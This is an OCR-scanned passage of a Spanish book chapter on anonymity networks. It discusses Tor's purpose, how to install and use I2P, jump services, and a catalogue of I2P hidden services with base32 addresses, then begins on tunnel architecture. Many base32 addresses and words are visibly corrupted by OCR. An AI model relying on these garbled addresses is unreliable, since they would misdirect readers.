para actos delictivos y por grupos organizados de ciberdelincuentes. Es cierto que hay personas que 
se aprovechan del anonimato y privacidad que proporciona Tor para cometer actividades ilegales, 
pero el objetivo del proyecto es que las personas puedan ejercer su derecho a la privacidad y que 
puedan navegar por Internet libremente, sin censura ni restriction a la hora de acceder a contenidos 
cp_e se encuentran prohibidos en su pais de residencia. Tor es una herramienta que ha sido utilizada 
per muchos anos de forma legitima, compartiendo contenidos valiosos y ayudando a denunciar 
lies atropellos cometidos por gobiemos o reglmenes dictatoriales. No hay que perder de vista este 
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objetivo en rnngun momento, la labor social del proyecto Tor es invaluable en los tiempos que 
corren y no hay que dejarse influenciar por el ruido y el miedo generalizado de personas que hablan 
desde el desconocimiento. 

1.2.3 ^Privacidad o ciberdelincuencia? 

Para nadie es un secreto que las redes anonimas y darknets, han sido relacionadas de forma muy 
estrecha con delincuentes y personas que se dedican a realizar actividades ilegales. No es algo que 
deba extranar al lector, ya que los mecanismos de protection que implementan las redes anonimas 
como Tor o I2P han demostrado ser lo suficientemente fiiertes como para proteger la identidad de un 
usuario incluso en los ambientes mas hostiles. 

Del mismo modo que ocurre con cualquier herramienta, el uso que las personas le dan no significa 
que se trate de una herramienta “buena” o “mala”, simplemente aporta los medios para conseguir 
diversos fines y lamentablemente, en algunos casos dichos fines incluyen actividades delictivas o 
que afectan negativamente la vida de otras personas. Es importante tener en cuenta que este tipo 
de soluciones no se han creado con el objetivo de proteger delincuentes, ni amparar pedofilos, ni 
facilitar los negocios entre estafadores y asesinos, ni afianzar actividades como el narcotrafico o la 
venta de armas. 

Tal como se ha mencionado anteriormente, el objetivo principal de redes como Tor, Freenet, I2P, 
entre otras, es el de proteger a aquellas personas que viven en paises en los que se comenten abusos 
contra los ciudadanos de forma sistematica y constante. Apoyar a aquellos que en realidad lo 
necesitan. Son herramientas que intentan plantear una solution al problema de la censura y represion 
que sufren muchas personas en el mundo. 

Dicho esto, es importante entender que la libertad de expresion y el derecho a la privacidad son 
fundamentals para el bienestar de cualquier sociedad y las nuevas tecnologias ayudan precisamente 
a conseguir el objetivo de salvaguardar y proteger esos derechos. No obstante, tambien hay que tener 
en cuenta que existen unos limites y que se regulan perfectamente con normas tan basicas como el 
respeto y la tolerancia hacia los demas. 

Personas con escaso criterio y education, bajo nivel de consciencia y serios problemas psicologicos, 
no suelen tener en cuenta estos principios basicos de convivencia y son los principals responsables 
de que espacios como las darknets de Tor o I2P incluyan contenidos que en muchas ocasiones 
atentan contra la dignidad de las personas. Jean Paul Sartre afirmaba: “mi libertad termina donde 
empieza la de los demas”. Probablemente es una de las mejores bases cuando se habla de libertades 
y derechos, ademas tambien es un buen punto de partida a la hora de diferenciar entre un delincuente 
y una persona que se preocupa por su privacidad o incluso, cuando se trata de una persona que utiliza 
los medios que tiene a su disposition para protestar de forma pacifica sobre diferentes cuestiones, 
tipicamente de caracter social. 

Cuando un servicio oculto en cualquiera de las darknets que se van a explicar en este documento, 
no cumple con esos principios minimos e incluye contenidos ofensivos y/o denigrantes, lo mejor 
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que se puede hacer es denunciar dicho contenido o dependiendo de las habilidades del usuario, 
intentar detectar vulnerabilidades que puedan ser utilizadas por los cuerpos de seguridad o los 
organismos pertinentes para la identificacion de los administradores del sitio en cuestion. Aunque 
se trata de servicios que se encuentran en una darknet, pueden verse afectados por cualquiera de 
las vulnerabilidades a las que se enfrenta cualquier servicio en Internet, en este sentido no existe 
ninguna diferencia entre sitios web en Internet y una darknet. 

Dicho esto, concluye el primer capitulo de este documento y a continuacion, el lector comenzara 
a explorar y entender la arquitectura de las redes anonimas mas robustas que existen actualmente. 
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Capi'tulo II 

I2P (Invisible Internet Project) 


En este capitulo se hablara sobre redes anonimas y probablemente la mejor forma de hacerlo es 
nombrando a I2P, una de las soluciones de anonimato mas estables y robustas que existen actualmente. 


2.1 Introduccion 

El proyecto I2P (Invisible Internet Project) nace en el ano 2003 de la mano de un grupo de hackers, 
desarrolladores y arquitectos de software con el objetivo inicial de crear una red virtual privada que 
fuera resistente a la censura y tuviera unos buenos niveles de desempeno y escalabilidad. Sus bases 
funcionales son muy similares a otras soluciones de anonimato como tales como Tor, sin embargo 
existen varias diferencias importantes que convierten a I2P en una altemativa bastante potente en 
terminos de anonimato y privacidad. Por otro lado, se trata de una solucion que se encuentra escrita 
en lenguaje Java aunque cuenta con algunos componentes anadidos escritos en lenguaje C y tal 
como se vera mas adelante en este documento, existen algunas librerias que permiten el desarrollo 
de componentes que se pueden desplegar directamente en una instancia de I2P o interactuar con 
otros participantes de la red de forma anonima. 

Una de las caracteristicas mas interesantes de I2P, es que permite la creacion de practicamente 
cualquier tipo de servicio sin necesidad de configuraciones complejas, por ejemplo es bastante 
trivial la puesta en marcha de servidores HTTP, FTP, SSH o SMB en cualquier instancia de I2P y no 
hacen falta conocimientos avanzados para hacerlo. Dichos servicios se ejecutaran de forma anonima 
al interior de la red de I2P y no son accesibles por ningun usuario en Internet que no se encuentre 
conectado a la red de I2P. 

El funcionamiento de I2P es similar al funcionamiento de otras redes anonimas. donde el trafico es 
enrutado por varios puntos de la red utilizando cadenas de servidores proxy, ademas en I2P no existen 
servidores o entidades confiables como en otras redes tales como Tor y sus autoridades de directorio, 
toda la red es completamente descentralizada y la information se encuentra diseminada en multiples 
puntos de la red. No obstante, aunque tenga similitudes con otras redes anonimas, I2P no intenta 
mejorar el anonimato de sus usuarios ocultando a sus participantes, se trata de una red orientada al 
mensaje donde cada paquete de datos es enrutado a su correspondiente destino de forma anonima. 
Esto quiere decir que cuando un emisor envia un mensaje, los demas participantes en la red pueden 
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conocer la existencia de dicho usuario, pero desconocen el numero, contenido y destinatarios de los 
mensajes que intercambia con otros participantes. De esta forma, muchos usuarios en Internet se 
pueden comunicar con un buen nivel de anonimato, ya que el trafico de todos los participantes es 
mezclado y difuminado por medio de cadenas de servidores proxy descentralizados, dando sufkiente 
cobertura tanto a personas que requieren un nivel de anonimato alto asi como para aquellos que no 
tienen requerimientos tan exigentes. Todos los mensajes son en esencia iguales. lo que permite dar 
cubrimiento a varios tipos de usuarios utilizando la misma red. 

El uso de I2P normalmente se lleva a cabo por medio de las aplicaciones disenadas para tratar con 
12P y rara vez se utiliza de forma directa, es asi como aplicaciones tales como “ eepsites ” (servidores 
web dentro de I2P), I2PSnark (un cliente para BitTorrent), I2PTunnel (servicios para enrutar flujos 
TCP/IP para aplicaciones comunes como IRC o SSH) entre otras, ayudan a sus usuarios a interactuar 
con I2P casi que de forma transparente. A continuacion, se explica el proceso de instalacion de I2P 
tanto en sistemas Windows como Linux. 


2.1.1 Instalacion de I2P 

El software de I2P se encuentra desarrollado en Java, lo que permite, entre otras cosas, que sea 
independiente de plataforma y facil de instalar en multiples plataformas, tales como Windows, Linux 
o Mac. Es necesario tener instalado el IRE (Java Runtime Environment) en el sistema y el software 
de I2P puede descargarse libremente desde el siguiente enlace: https://geti2p.net/es/download. Para 
comenzar con el proceso de instalacion, basta con ejecutar el JAR de instalacion o el ejecutable 
.EXE, dependiendo del sistema operativo donde se quiera instalar y seguir el asistente paso a paso. 

En el caso de Instalar I2P en un sistema Windows, el programa puede instalarse como un servicio 
del sistema operativo, el cual se podra configurar para arrancar de forma automatica o manual. En 
el caso de instalar I2P en un sistema Linux o Mac, se recomienda utilizar un usuario con privilegios 
limitados para iniciar el servicio de I2P, para ello, se debe editar el fichero “<DIR_INSTALL>/ 
i2proute” y establecer el nombre del usuario con el que se debe iniciar el servicio en la propiedad 
“RUN_AS_USER”. Para iniciar o detener el controlador de I2P despues de instalar el software, se 
debe ejecutar el script “i2prouter” de la siguiente forma. 

>./i2prouter start 
Starting I2P Service... 

Waiting for I2P Service. 

running: PID:14506 

Los parametros admitidos de “i2prouter” son start ”, “ status ” y “ stop ”. Despues de iniciar el servicio 
de I2P y partiendo de la configuration por defecto del programa, el puerto 7657 se encontrara abierto 
y esperando conexiones por parte de los clientes. En dicho puerto se encuentra en ejecucion la 
consola de administration web de la instancia de I2P recien instalada. 

Por defecto, I2P cuenta con una aplicacion llamada I2PTunnel que permite configurar diferentes 
tipos de tuneles que apuntan a servicios concretos. Sobre esta herramienta se hablara con mayor 
detalle a lo largo de este capitulo, pero de momento es importante saber que I2PTunnel viene con 
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una serie de servicios que le permitiran al usuario navegar por la web profunda y desplegar servicios 
en ella. 
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Imogen 02.01: Instancia de 12P en ejecucion. 

Los dos servicios mas comunes cuando un usuario comienza a utilizar I2P son los servidores proxy 
Hfcl tipo HTTP y HTTPS, los cuales permiten el acceso a la web profunda de I2P. Para ver el estado 
lie dichos servicios e iniciarlos o detenerlos segun sea el caso, es necesario dirigirse a la siguiente 
siata: http://localhost: 7657/i2ptunnelmgr 
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Imogen 02.02: Servicios por defecto en I2PTunnel. 
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Para poder utilizar los servidores proxy HTTP y HTTPS de I2P, es necesario editar la configuration 
del navegador web que se desea utilizar y apuntar a la maquina local en el puerto “4444” para las 
peticiones por HTTP y a la maquina local en el puerto “4445” para las peticiones por HTTPS. 


2.1.2 Servicios ocultos en I2P 

A partir de este punto, es posible acceder a la web profunda de I2P y a los servicios ocultos que la 
componen, sin embargo antes de explicar la forma de hacerlo, es necesario aclarar algunas cuestiones 
importantes sobre la forma en la que se resuelven las direcciones de los servicios ocultos de I2P. 
En primer lugar, en I2P no existe un sistema de resolucion de nombres de dominios como el clasico 
DNS, en su lugar, existe un sistema de nombrado basico que viene instalado en cada instancia de I2P 
y que depende completamente de un fichero de texto piano que vincula un dominio “.i2p” con una 
direccion en base32 o base64. La direction en base32 o base64 es lo que se conoce como un destino 
y constituye la firma del servicio oculto, la cual incluye toda la information necesaria para poder 
acceder al servicio en cuestion. Una buena forma de comprender lo que es un destino en I2P, consiste 
simplemente en asociar dicho termino con la combination' de una direccion IP o un nombre de 
dominio con un puerto concreto, es decir, la ruta completa para poder acceder a un servicio en la red. 

Por otro lado, En I2P no existe un sistema centralizado para resolver un destino con su correspondiente 
dominio no funciona como el clasico y conocido DNS ya que en el caso de I2P todos los 

hostnames son locales. Este sistema de nombrado se puede gestionar por medio de la aplicacion 
“ SusiDNS ”, la cual se encuentra instalada por defecto en todos los enrutadores de I2P en la siguiente 
direccion: http://127.0.0.1:7657/susidns/index. Sobre el funcionamiento de “ SusiDNS ” se hablara 
mas adelante a lo largo de este capitulo. 

Por otro lado, un servicio oculto en I2P puede apuntar a cualquier tipo de servidor, desde los 
tipicos servidores web, hasta servicios SSH, FTP, SNMP, SMB, POP, SMTP, etc. En I2P no existen 
restricciones sobre los protocolos soportados por la red y admite la creation de practicamente 
cualquier tipo de servicio oculto. No obstante, los mas conocidos son los servicios web, los cuales 
en la terminologla de I2P son conocidos como “ EEPSites ”. Un EEPSite es exactamente igual que 
cualquier servicio de los que se encuentran disponibles en Internet, con la unica diferencia que se 
alojan en la red de I2P y estan asociados a un destino concreto (direccion en base32/base64). 

Dado que el sistema de resolucion de I2P se basa en un fichero de texto piano (conocido en 
terminologia de I2P como “addressbook”) que asocia un destino con un dominio “.i2p”, es muy 
posible que algunos de los servicios ocultos a los que un usuario desea acceder no se encuentren 
en dicho fichero y por ese motivo, el proxy de la instancia local de I2P no pueda resolver el destino 
al que el usuario intenta acceder. Esta situation es bastante comun y para solucionarla se pueden 
hacer dos cosas, o bien se realiza el mapeo del destino y el dominio “.i2p” al que se quiere acceder 
utilizando SusiDNS o utilizar lo que se conoce como un “jump service”, el cual funciona como un 
proxy entre el cliente y el destino sin necesidad de agregar el mapeo de la direccion en base32/base64 
en el addressbook local. Algunos de los ‘ jump services ” mas utilizados y que vienen incluidos en el 
“addressbook” de I2P por defecto son los siguientes: 
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- http ://i2host. i2p/cgi-bin/i2hostj ump? 

- http://stats.i2p/cgi-bin/jump.cgi?a= 

- http://no.i2p/jump/ 

- http://i2pjump.i2p/jump/ 


Cuando el servidor proxy de I2P no es capaz de resolver el destino de un servicio oculto, ensena 
un mensaje al usuario indicando que el servicio en cuestion no se encuentra incluido en la libreta 
de direcciones local ( addressbook ) y permite aplicar cualquiera de las dos soluciones explicadas 
anteriormente. 



El sitio web no se encontro en la libreta de direcciones 

El sitio web no se encontro en la libreta de direcciones de su router I2P. Compruebe el 
enlace o busque una direccion Base 32 o Base 64. Si tiene una direccion Base 64. 
anadala a su libreta de direcciones. De otro modo, encuentre una direccion Base 32 o 
un enlace de ayudante de direccionamiento (address helper), o use uno de los enlaces a 
un servicio de salto (jump, direccionamiento distribuido) de debajo. 

^Entra a esta web a menudo? Vea el FAQ para obtener ayuda de como ahadir 
suscripciones a su libreta de direcciones. 

No se pudo encontrar el siguiente destino: 
http://lawiki.i2p/ 

Click a link below for an address helper from a jump service 

i2host.i2p jump service 
stats.i2p jump service 
no.i2p jump service 
i2pjump.i2p jump service 


Imogen 02.03: Servicio oculto no encontrado en el addressbook local. 


Como se puede apreciar, no se puede acceder al servicio ya que el dominio “http://lawiki.i2p” no se 
encuentra incluido en la libreta de direcciones. Una solucion permanente a este problema que evitara 
que se ensene el mismo mensaje cada vez que se intente acceder a este servicio oculto concreto, 
consiste en simplemente agregar el mapeo de la direccion en base32 o base64 del destino y el 
dominio “.i2p”. No obstante, en este caso concreto hay un problema y es que solamente se dispone 
de la direccion del dominio, pero no de la direccion del destino en base32 o base64. 

En este sentido, la solucion nuevamente consiste en utilizar alguno de los “jump services” 
disponibles para obtener la direccion del destino y despues, si es el deseo del usuario, incluir el 
mapeo correspondiente en la libreta de direcciones local. Los servicios de salto representan una de las 
mejores formas de encontrar las direcciones de destino partiendo de un dominio ~\i2p" determinado 
y se recomienda su uso en lugar de incluir demasiadas entradas en la agenda de direcciones local de 
la instancia de I2P. 
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| Informacion: Nuevo nombre de host con Ayuda de Direccion _] 

El enlace de ayuda de direcciones que ha abierto es para un nuevo nombre de dominio 
que no estaba en su libreta de direcciones. Quizl^ desee guardar este dominio en su 
libreta de direcciones local. Si lo guarda en su libreta de direcciones, no vera este 
mensaje de nuevo. Si no lo guarda, el dominio se olvidara despues de reiniciar el ruter. 
Di no desea visitar este dominio, pulse en boton "volver" de su navegador. 


[a# Accedcr a Iawiki.i2p sin guardar] 
[ffi Guardar Iawiki.i2 p en la libreta de direcciones del tourer I2P y continuar hacia cl sitio web] 

f Guardar Iawiki.i2p en la libreta de direcciones maeslia y continuar hacia el sitio web] 

[Guardar Iawrki.i2p en la libreta de direcciones personal y continuar hacia el sitio web] 


Imagen 02.04: Resolution de la direction de un destino por parte de un “jump serx'ice ". 

Finalmente, es importante tener en cuenta que una instancia de I2P requiere tiempo para consolidarse y 
conseguir suficientes tuneles para enrutar el trafico. Esto quiere decir que inicialmente la navegacion 
a los servicios ocultos que se encuentran alojados en la web profunda de 12P sea demasiado lenta o 
incluso no sera posible navegar en lo absoluto, sin embargo despues de un tiempo, la instancia de I2P 
sera lo suficientemente conocida en la red y contara con suficientes repetidores como para conformar 
tuneles rapidos y fiables. 

Una vez conocidos los conceptos basicos de configuracion de I2P, el siguiente paso logico consiste 
en adquirir soltura y encontrar los mejores contenidos en la web profunda de 12P. No es una tarea 
trivial, ya que es necesario consultar constantemente los servicios que son previamente conocidos 
y los nuevos, ya que una caracteristica que es comun en practicamente todas las redes anonimas, es 
que los servicios ocultos que se alojan en ellas no suelen ser servicios 24x7 y en muchas ocasiones 
se pueden encontrar caidos temporalmente o desaparecer completamente. 

No hay que olvidar que los servicios ocultos son simplemente servidores de cualquier tipo que 
un usuario en la red ha configurado y arrancado. Evidentemente es una situacion bastante comun 
que dicho usuario decida cerrar el sitio en cuestion o simplemente detener su instancia de I2P por 
cualquier motivo. Dicho esto, es importante considerar que no hablamos de los tipicos servicios en 
Internet que se encuentran disponibles practicamente todo el tiempo, en una darknet como la de 
I2P, Freenet o Tor, es bastante frecuente encontrar servicios que desaparecen completamente con el 
tiempo. 

No obstante, existen algunos servicios ocultos en I2P que suelen estar disponibles la mayor parte del 
tiempo y que pueden ser un buen inicio para adentrarse en la web profunda de I2P. 
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2.1.2.1 Servicios ocultos para comenzar a descubrir la web profunda de I2P 

Evidentemente, las motivaciones por las que una persona puede comenzar a navegar en la web 
profunda de I2P pueden ser muy variadas, sin embargo se asume que el lector de este documento 
se encuentra interesado en contenidos sobre cualquier area del conocimiento humano o sobre 
mecanismos para compartir information de forma privada y anonima con otras personas. Se asume 
que el lector esta interesado en aquellos contenidos que no constituyan o promuevan la vulneracion 
de ningun derecho fundamental. 

Si el lector espera encontrar una lista con servicios ocultos que no respeten como minimo estas 
reglas basicas o que incluyan contenidos ilegales, es mejor que busque otros recursos distintos a este 
documento. Dicho esto, el siguiente listado representa una buena forma de comenzar a descubrir 
otros servicios ocultos en la Darknet de I2P y descubrir lo que la red tiene para ofrecer. 

2.1.2.1.1 Servicios de almacenamiento 


Direccion I2P 

open4you.i2p 

Direccion Base32 

ice6ax5qrzwfwzsy64bctf§6zlzpuzdr5np65zsxlbt 

7hztyc6a.b32.i2p 

Descripcion 

Se trata de un servicio de hosting muy popular en la darknet de I2P, ya que es un servicio gratuito 

en el que los usuarios cuentan con 1GB de espacio disponible. acceso a un servicio FTP. PHP5. 
MySQL., entre otras caracteristicas interesantes. 


Direccion I2P tracker2.postman.i2p 

Direccion Base32 ahsplxkbhemefvvvYinl7qovzl5a2b5xo5i71yai7ntd 

_ unvcyfdtna.b32.i2p 

Descripcion 

Uno de los servicios mas conocidos en I2P para subir ficheros torrent en I2P. Es importante tener 
en cuenta que es posible que algunos de los torrents que se encuentran almacenados aqui. no 
tengan el contenido que supuestamente deberian tener. ademas. es posible que incluyan contenidos 
maliciosos que afectaran al ordenador del usuario. con lo cual es recomendable tomar 
precauciones y evitar la ejecucion de program as procedentes de estos sitios. 


Direccion I2P 

i2push.i2p 

Direccion Base32 

mabdiml4busx53hjh4el5wlyn4go5mgji2dxsfyel 
agi4v5mzjxq.b3 2. i2p 

Descripcion 

Servicio oculto para subir y descargar ficheros y directorios. Se integra con Tahoe y ademas. 

permite subir documentos sin restricciones de uso ni limite de tiempo en los ficheros subidos. 


Direccion I2P 

Iib.i2p 

Direccion Base32 

nqolhhg7wtr3wyjsxszjhjgh45uztj3xlrtydagwi4fi 

7ftnbqsq.b32.i2p 

Descripcion 

Se trata de una libreria en la que es posible subir y descargar libros de varios eeneros. 
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2.1.2.1.2 Servicios de busqueda y directories 


Direccion I2P 

eepstatus.i2p 

Direction Base32 

3 mzmrus2or on5 fxptw7hw2puho3 bnqmw2hqy 7n 
w64dsnjwdilva.b3 2 .i2p 

Description 

Se trata de un servicio de registro que se encarga de mantener un listado bastante complete de 
sitios web (eepsites) en la web profunda de I2P. Ensena las direcciones de los senicios que se han 
agregado recientemente, asi como las direcciones que ya llevan algunos dias funcionando. Ademas 
de mostrar el dominio I2P del eepsite, tambien se ensena la fecha de la ultima vez en la que el 

senicio se encontraba activo. 



Direccion I2P 

direct. i2p 

Direccion Base32 

upxcjhddpeeizq2 cdtt4 esotssrtuvs5y74gram2ktj m 
mcc6mmfq.b32.i2p/ 

Descripcion 

Buscador de sen icios ocultos muy simple e intuitivo. Ensena una tabla en la que aparece la URL 

de cada sen icio oculto, su estado y el titulo. 


Direccion I2P 

inr.i2p 

Direccion Base32 

joajgazyztfssty4w2on5oaqksz6tqoxbduy553y34 

mf4byv6gpq.b32.i2p 

Descripcion 


Se trata de un directorio de servicios ocultos en I2P que se encuentra a disposicion de los usuarios, 
los cuales pueden registrar los “destinations” de sus sen icios ocultos para que puedan ser 
encontrados facilmente por otros usuarios. 


Direccion I2P 

i2pfind.i2p 

Direccion Base32 

cgkswg5 iezxdvfds2p5 Igvhfhvd6sv3 r72yioarywn 
wgmiazbw3q.b32.i2p/ 

Descripcion 

I2PFind es un senicio de busqueda que dene la particularidad que permite buscar sen icios ocultos 

en I2P y/o en Tor. Ademas, cualquiera puede registrar su propio dominio I2P para que sea 
indexado por el motor de busqueda. 


Direccion I2P 

torrentfinder.i2p 

Direccion Base32 

mpe 73 okj 7wq2xl6clofl64cn6v7vrvhpmi6d524nr 
svbeuvjxalq.b3 2 .i2p/ 

Descripcion 

Torrent Finder es uno de los buscadores de Torrents en la web profunda de I2P mas populares y 
completes, ya que se basa en otros sen icios en I2P tales como diftracker.i2p y 

tracker2.postman.i2p 



Direccion I2P 

linkz.i2p 

Direccion Base32 

x31ayud2n2p5doors6c3xki6jzxbtqqrqn\Ta3f3oh 

4ubbu2b2kq.b32.i2p 
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Description 

Linkz es un servicio oculto que incluye un directorio con varios enlaces a otros eepsites en la web 
profunda de I2P. Todos los enlaces se encuentran separados en diferentes categorias e incluyen 
varios temas que pueden ser interesantes para el lector 


Direccion I2P 

epsilon. i2p 

Direccion Base32 

ze4bgoho\vgjzhoacnkuhb26stjktimoffyvt5nbfiuG 

is77fecgoa.b32.i2p 

Description 

Buscador de servicios ocultos en la web profunda de I2P simple y eficiente. 


Direccion I2P 

btdigg.i2p 

Direccion Base32 

u\Lxr\5xau3gggkgqodcxekcoea\tsuvkxkeuweeo 

gzy42sa5yxq.b32.i2p 

Descripcion 

Buscador de torrents que utiliza el protocolo DHT. Los resultados del buscador solamente retoman 
los enlaces de los torrents encontrados (enlaces magnet), con lo cual es necesario que el usuario 
cuente con un cliente de torrents para descargar el contenido. 


2.1.2.1.3 Foros, wikis y documentacion 


Direccion I2P 


zzz.i2p 


Direccion Base32 


ukeu3k5oycgaauneqgtnvselmt4yemvoilkln7jpva 
mvft7dnkdq.b32.i2p 


Description 


“zzz” es el nickname de uno de los desarrolladores de I2P y miembros mas activos de I2P. Dado 
que a la fecha de redactar este documento, I2P sigue estando en version “beta”, el foro de ZZZ es 
on buen recurso para conocer las ultimas novedades y problemas tecnicos que experimentan los 
usuarios de la red, ademas es un sitio en el que cualquiera puede registrarse y abrir un hilo sin 
ningun tipo de restriccion. Sin duda es un recurso muy util para aprender y posteriormente apoyar 
al proyecto. 


Direccion I2P 

planet.i2p 

Direccion Base32 

y45f23mb2apgywmftrjmfg35oynzfvvjed7rxs2mh 

76pbdeh4fatq.b32.i2p 

Descripcion 

Se trata de un sitio web en el que se incluyen las ultimas novedades en I2P. Se pueden encontrar 
cosas como servicios ocultos de interes, nuevos desarrollos, versiones de I2P en diferentes 
plataformas y arquitecturas, bugs descubiertos con sus respectivos parches, entre otras cosas. 


Direccion I2P 

killyourtv.i2p 

Direccion Base32 

aululz24ugumppq56jsaw3d7mkbmcgo7dl21gean 

vpniyk2cbrda.b32.i2p 
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Descripcion --— 

Se trata de un blog con informacion tecnica bastante util sobre I2P y otras redes anommas. Existen 

varios manuales y servicios interesantes. 


Direccion I2P 

Iawiki2p.i2p 

Direccion Base32 

dkb 5 f6 3 ob sb 6wmzcgilebj vmgvw 4\vmc gzbkczu 

3 sntgckmtzweza.b32 .i2p 

Descripcion 

Una wiki en Castellano muy completa sobre el uso de I2P y otras redes anommas. Cuenta con 

explicaciones muy detalladas sobre privacidad, anonimato y cuestiones tecmcas relacionadas con 

I2P y Tor. Es probablemente. uno de los mejores sitios dispombles en Castellano sobre anonimato y 
privacidad en la web profunda de I2P. 

Direccion I2P 

ugha.i2p 

Direccion Base32 

z3f3owc72awbywk4p6qb512mxgit\i s6ejztggbpn 

2a3ddmymfida.b32.i2p 

Descripcion -- 

Una wiki simple pero con buenos recursos sobre eepsites en I2P e informacion tecnica. 

Direccion I2P 

syndie.i2p 

Direccion Base32 

xa6 3 tpfoaqt3zru2 ehxjj fbpadwj 4 ha6qsdvtcqtyr3b 
7hmt4iaq.b32.i2p 

Descripcion 

Syndie es un sistema para la creacion y gestion de foros descentralizados en I2P. Es muy popular 

entre los usuarios. 



Direccion I2P 

thetinhati2p 

Direccion Base32 

udvz7opxck6knhsww5ii6dgufbstxzctilwnenzhw 

4iaxfdeia2a.b32.i2p 

Descripcion 


Se trata de un sitio con articulos y recursos muy interesantes sobre privacidad y anonimato. 

Destaca por el orden y calidad de las publicaciones. 


2.1.2.1.4 Servicios varios 


Direccion I2P 

hq.postman.i2p 

Direccion Basc32 

27ivgyi2xhbwjyqmnx3ufjvc2slg6mv7767hxct74 

cfwzksj emaq.b32. i2p 

Descripcion 

Servicio en I2P para crear cuentas de correo electromco de forma anomma. Una cuenta en 

Postman puede ser utilizada desde cualquier cliente de I2P para recepcion y envio de mensajes de 
correo electronico. Cuando se accede al servicio oculto. en la seccion “Pages” se encuentran todas 
las opciones disponibles en Postman y que permiten crear y gestionar cuentas. 
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Direction I2P 

ihave2p.i2p 

Direction Base32 

s6npkh5hzslijnzohm2om32un4sh4r2urp6hiy2fy 

a6oo55ehcyq.b32.i2p/ 

Description 

Se trata de un sitio con varios tipos de servicios, tales como pastebin con cifrado y servidores 
proxy del http/https/socks a la cleamet por medio de Tor y/o I2P. Este ultimo en concreto, se 
encuentra disponible en una direccion distinta: 

ihave2proxy.i2p/ginbb7blr6rvgfkuyx7435rakosdilzeduklygrkwaw3dwduntcq.b32.i2p 


Direccion I2P 

zerobin.i2p 

Direction Base32 

3564erslxzaoucqasxsjerk4jz2xril7j2cbzd4p7flpb 

4ut67hq.b32.i2p 

Description 

Servicio oculto que permite publicar mensajes de forma pm'ada y con una fecha de caducidad. 

Ademas. tiene la opcion de que 

se auto-destruya despues de que el mensaje es leldo. 


Direction I2P 

- git.repo.i2p 

- pull.git.repo.i2p 

- push.git.repo.i2p 

Direccion Base32 

vsd2vtgtuua2vwqsal2mpmxm2b2cpn3qzmqjoeu 

mrrw2p4aot7uq.b32.i2p 

3 so7htzxzz6h46qyjm3fbd73 5zl31rblerlj2xxybho 
bublcv67q.b32.i2p 

jef4g5 vxnqybm4zpouum3 Izbl6ti6456q5 7nbyj 5k 
fyldkempm3ab32.i2p 

Descripcion 

Sitio en la web profunda de I2P en el que se pueden registrar proyectos y realizar las mismas tareas 
de administration que se pueden hacer con cualquier repositorio Git en Internet. 


Direccion I2P 


aplus.i2p 

Direccidn Base32 


h671ym6btfqinjs5ye272fo6uze2uvjk6t7qabibocj 

edfcv5fva.b32.i2p 

Descripcion 



Se trata de una red social muy simple 

en la que sus miembros pueden intercambiar mensajes y 

chatear. Para poder utilizarla, es necesario estar registrado, de lo contrario solamente sera posible 
buscar los usuarios que se encuentran registrados. 


Direccidn I2P 

sin.i2p 

Direccidn Base32 

tph27jvsnriyy3fcxmg44icunb5ugi3qhue3e7skwn 

4awp5j5zyq.b32.i2p 
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Description _ 

Un sistema que recolecta y analiza los ultimos acontecimientos en cada pais del mundo y en base a 
dicha informacion, se encarga de generar distintos niveles de “SecCon” (Security Conditions) en 
cada pais. Este sistema es interesante para conocer de primera mano la situacion social y politica 
de cada pais del mundo y acceder a las recomendaciones que incluye para mantener unos niveles 
de s eguridad minimos tanto en el viaje como en la estancia en cualquier pais. _ 

La tarea de relacionar las direcciones en base32 con sus correspondientes dominios I2P, puede ser 
bastante laboriosa y tediosa, no obstante en cualquier instalacion por defecto del enrutador de I2P, 
viene incluido un “addressbook” bastante completo con muchos de los servicios ocultos que se han 
detallado anteriormente, lo que evita tener que editar el fichero de hosts manualmente o utilizar 
alguno de los servicios de salto disponibles en I2P. Dicho “ addressbook ” puede ser consultado y 
gestionado desde la aplicacion SusiDNS y se encuentra disponible en la consola de administration 
de un enrutador I2P en la siguiente direction: http://l27.0.0.1:7657/susidns/addressbook asumiendo 
que no se ha cambiado la configuration por defecto y el puerto “7657” es utilizado por el enrutador 
de I2P. 

Por otro lado, tal como se mencionaba anteriormente, comenzar con 12P suele ser dificil ya que 
un repetidor tiene que darse a conocer para poder crear tuneles con un buen rendimiento, as! 
que se recomienda mantener la instancia de I2P levantada todo el tiempo que sea posible. Esta 
recomendacion es especialmente aplicable para nuevas instalaciones de I2P. 


2.2 Arquitectura 

Desde el punto de vista tecnico, la arquitectura de I2P es muy interesante y demuestra que su 
nivel de madurez y avance es muy alto. Su funcionamiento intemo es muy complejo pero merece 
la pena comprenderlo ya que ha dado lugar a otras arquitecturas y soluciones muy robustas que 
actualmente se encuentran en estado de desarrollo. La arquitectura de I2P esta conformada por 
varios componentes que interactuan entre si y que se deben entender correctamente para poder tener 
una vision global sobre su funcionamiento y uso. En los siguientes apartados se explicara en detalle 
la arquitectura de I2P. 


2.2.1 Tuneles 

Hasta este momento se ha hablado bastante sobre los tuneles que son utilizados en I2P para el envio 
de paquetes, pero de momento no se ha dado una explication detallada sobre su funcionamiento. 
En primer lugar, los tuneles representan uno de los componentes mas importantes dentro de la 
arquitectura de I2P, ya que permiten el envio y la reception de paquetes entre los emisores y 
receptores que se encuentran en la red. Un tunel es la composition de un conjunto de enrutadores 
que se encargan del envio los paquetes de datos a un destino determinado, permitiendo de este 
modo la comunicacion anonima entre distintas instancias de I2P. Cuando un usuario inicia I2P en 
su ordenador, automaticamente se convierte en un enrutador y en la medida que se integra en la 
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red, se convertira en parte de los tuneles que crean automaticamente otras instancias de I2P que se 
encuentran dentro de la red, esto quiere decir, que todos los usuarios siempre deben aportar un poco 
de su ancho de banda para que otros usuarios puedan utilizar I2P. Evidentemente, el rendimiento 
general de la red depende de la cantidad de enrutadores que se encuentran integrados en la red y por 
este motivo, entre mas usuarios utilicen I2P mejor sera el desempeno general de la red. 

Por otro lado, los tuneles solamente funcionan en unico sentido, ya sea para enviar o recibir paquetes 
de datos desde un emisor a un receptor o viceversa, por este motivo, para que una instancia de I2P 
pueda enviar y recibir informacion, debe crear tuneles de entrada y de salida, los cuales se encargaran 
de enviar y recibir paquetes de datos en I2P. Tambien es importante tener en cuenta que los paquetes 
de datos que viajan entre cada uno de los enrutadores de un tunel viajan cifrados y cada uno de los 
enrutadores que recibe el paquete, solamente puede acceder a la informacion correspondiente del 
siguiente enrutador al que se le debe enviar el paquete de datos. La imagen 02.05 ensena de manera 
grafica la explicacion anterior y resume la forma en la que dos instancias de I2P se comunican. 



